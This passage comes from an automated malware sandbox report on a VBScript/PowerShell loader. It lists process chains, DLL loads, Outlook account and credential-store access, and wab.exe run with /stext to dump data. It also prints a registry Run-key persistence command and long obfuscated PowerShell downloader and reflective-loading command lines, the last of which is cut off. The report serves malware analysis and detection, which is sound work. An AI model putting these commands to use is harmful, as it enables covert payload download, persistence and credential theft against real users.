              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Nuchale" /t REG_EXPAND_SZ /d "%Piptadenia% -w 1 $Negerens127=(Get-ItemProperty -Path 'HKCU:\Sortiment\').Anadems;%Piptadenia% ($Negerens127)"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\peqezcketotthbxautag"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\aywoauvyhwlgrptelemijrt"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\cajhaffzuedltvhiuphbmeobpae"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Nuchale" /t REG_EXPAND_SZ /d "%Piptadenia% -w 1 $Negerens127=(Get-ItemProperty -Path 'HKCU:\Sortiment\').Anadems;%Piptadenia% ($Negerens127)"Jump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptnet.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cabinet.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: slc.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: version.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2321744797.00000000071A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000005.00000002.2318647454.0000000000B4C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2321744797.0000000007177000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: tem.Core.pdbj source: powershell.exe, 00000005.00000002.2321744797.0000000007177000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: bqm.Core.pdb source: powershell.exe, 00000005.00000002.2321744797.0000000007177000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Windows\System.Core.pdbpdbore.pdb source: powershell.exe, 00000005.00000002.2321744797.00000000071A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb= source: powershell.exe, 00000005.00000002.2321744797.0000000007177000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell "$Nedskrivningstidspunkter = 1;$Hotplate='S';$Hotplate+='ubstrin';$Hotplate+='g';Function Andelskapita", "0")
              Source: Yara matchFile source: 00000005.00000002.2332047003.000000000A8C3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2331670219.0000000009450000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2320148012.0000000005A73000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.2606411580.000002B7B8242000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Upslip)$global:Karo = [System.Text.Encoding]::ASCII.GetString($Halalahs140)$global:Euryaleae=$Karo.substring(325807,29120)<#Overfoeres Solary Operates #>$Garagemester=Andelskapitals
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Sadducees $Dokumentsidernes $Rafaellle), (Attaintment @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Ugemagasins = [AppDomain]::CurrentDomain.GetAssemblie
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Turgors)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Gcc, $false).DefineType($Lnindtgtens, $Crescentia
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Upslip)$global:Karo = [System.Text.Encoding]::ASCII.GetString($Halalahs140)$global:Euryaleae=$Karo.substring(325807,29120)<#Overfoeres Solary Operates #>$Garagemester=Andelskapitals
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Nedskrivningstidspunkter = 1;$Hotplate='S';$Hotplate+='ubstrin';$Hotplate+='g';Function Andelskapitals($Hentningens){$Stadsgartnerne167=$Hentningens.Length-$Nedskrivningstidspunkter;For($Perifere=6; $Perifere -lt $Stadsgartnerne167; $Perifere+=(7)){$Lungfishes+=$Hentningens.$Hotplate.Invoke( $Perifere, $Nedskrivningstidspunkter);}$Lungfishes;}function Ordonnant($splatcher){& ($Typechecke) ($splatcher);}$Nonlover=Andelskapitals ' Sys.aMG oundo hypopzHast.eiMetacrlP,nktulE,sekuaUdfore/Salva.5F.lked.Sto.mh0Bjerge Slips (C llutWBa aviiout,abnSpearmdBasisaoGustneweuryprs ,nsyn ,elaarNCor ndTDec,nc Ign,r1meadwo0Insali.Rygskk0.ceptr;,eutro CamporWReveiliBetalin Co,pl6 Shyes4Bra in;Tegn,f Fjern,xAmmoni6Ch.ysa4 Ps ud;Chemeh Trichor BefrdvTrilli:degend1Archse2r mmea1Shrimp.Macada0 Smrke)No loc RidderGTreskieUhjt,dc PaasykSkurveoUnp in/Introd2Sulted0H.hcer1 fiks.0Missan0 Ulpko1Elect,0 Uds,i1Her.is Lager.FAntipriSams.er Dunfie VarimfsndrerouninvexBroder/Fleece1Ste ku2Fonot,1Frigin.Oblige0Au ifo ';$Staser112=Andelskapitals 'L.gestUPostkasAlkohoe.nlaidr rero-Ka.ensAGaldesgE.dosaeUnsof ncou.tet Garvn ';$tamari=Andelskapitals ' Wic,ihSkridttFlisebtFlinkepRelaks:Spis k/Cablem/ esews8C.efsa7Drame,. Ubehv1Startl2 Dishi1 March. nrum1 Unbed0Aarlig5G psba.Pr.duk1Opteg 8 Oplys4Periv,/NeoclaUD,tabedOmnifavKas,ageCo.logjRetshanWhatsiiAlvildnO,gaveg CleweecowgirrSkriv,nPensioe Miracs Me.pa.SpinulaBovrupaforsknfDi.ndr ';$Unhesitatively=Andelskapitals ' Julea>Rhizop ';$Typechecke=Andelskapitals 'OrfedeiShyesseBesrgex Fr.tt ';$Boblegummiets142='Flyverdragterne';Ordonnant (Andelskapitals 'Plast.SCancane Sociat Udraa-wa,tebCAtavisoRek.rsnDiskoft Ild,leTransvnGu.deltRelosi Dok,me-Sla,gePOuttroaB.kebitNowtschSam.en indtjTKalibr:Torlek\Titre,HProlepaSmokehnVand.ok Idio nMexicasBek ftv DibensRokkesnTjreple Abstrt ocamasCharla3Myelof4Aargan.Photo t PickaxUlydigt,ormon Swith-GutturVCalo,iaVoltenl Khaf uGa biee A,tim ortjn$McnaugBC.llefo nthrbSksforltoldfoeKommutgObligauThuggemSpaltemsonnibiLappedetinta.t AttessAm.est1Noncoo4 ecidi2Cariam;Capafa ');Ordonnant (Andelskapitals ',ostvsiOmfo.mftiaars Change(Tm erftLakkedeHasenss TuvaltA,vask- Ascenp Tes,uaApriortAcronyhGylden ritonT Minim:Bund l\K.pitaHalvarsa Te.ron G,netkSticklnHol,afs gurnav nvades .redin specieDammust rottesKlassi3Sgneda4 Serie.Fi.klvtRhinanxbreasttMultim)Sp,uci{Ministe Br.dexGrundviNdringt Sprog}Doreth;R.cipr ');$Nonenvious = Andelskapitals 'Mistnke spec,cT,avelhHypo,toNo enc Komple%Ov rheasmdenapCorpsmpskurend Midjeaeuectit EfteraBroade%Ejidos\Ko.roidLitmusePathankTolvaalSh rtealaithrr Umisfa SpisetT ansmi WormroEntwinnconsec. ashiSurinseuJea.sepOccide Vesteu&Nuppe.&extra HankneSkurvoc.ulmothSatayfoStat,s iste$kolle. ';Ordonnant (Andelskapitals 'Matri,$Plovfug,arbgel KleptoRoligebMortada,etteflBienni:Cyanocb ErminamingelaK,rkebsM.skinkRede,iaPigmenpSnilde=vandre( trewcTredv
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Nedskrivningstidspunkter = 1;$Hotplate='S';$Hotplate+='ubstrin';$Hotplate+='g';Function Andelskapitals($Hentningens){$Stadsgartnerne167=$Hentningens.Length-$Nedskrivningstidspunkter;For($Perifere=6; $Perifere -lt $Stadsgartnerne167; $Perifere+=(7)){$Lungfishes+=$Hentningens.$Hotplate.Invoke( $Perifere, $Nedskrivningstidspunkter);}$Lungfishes;}function Ordonnant($splatcher){& ($Typechecke) ($splatcher);}$Nonlover=Andelskapitals ' Sys.aMG oundo hypopzHast.eiMetacrlP,nktulE,sekuaUdfore/Salva.5F.lked.Sto.mh0Bjerge Slips (C llutWBa aviiout,abnSpearmdBasisaoGustneweuryprs ,nsyn ,elaarNCor ndTDec,nc Ign,r1meadwo0Insali.Rygskk0.ceptr;,eutro CamporWReveiliBetalin Co,pl6 Shyes4Bra in;Tegn,f Fjern,xAmmoni6Ch.ysa4 Ps ud;Chemeh Trichor BefrdvTrilli:degend1Archse2r mmea1Shrimp.Macada0 Smrke)No loc RidderGTreskieUhjt,dc PaasykSkurveoUnp in/Introd2Sulted0H.hcer1 fiks.0Missan0 Ulpko1Elect,0 Uds,i1Her.is Lager.FAntipriSams.er Dunfie VarimfsndrerouninvexBroder/Fleece1Ste ku2Fonot,1Frigin.Oblige0Au ifo ';$Staser112=Andelskapitals 'L.gestUPostkasAlkohoe.nlaidr rero-Ka.ensAGaldesgE.dosaeUnsof 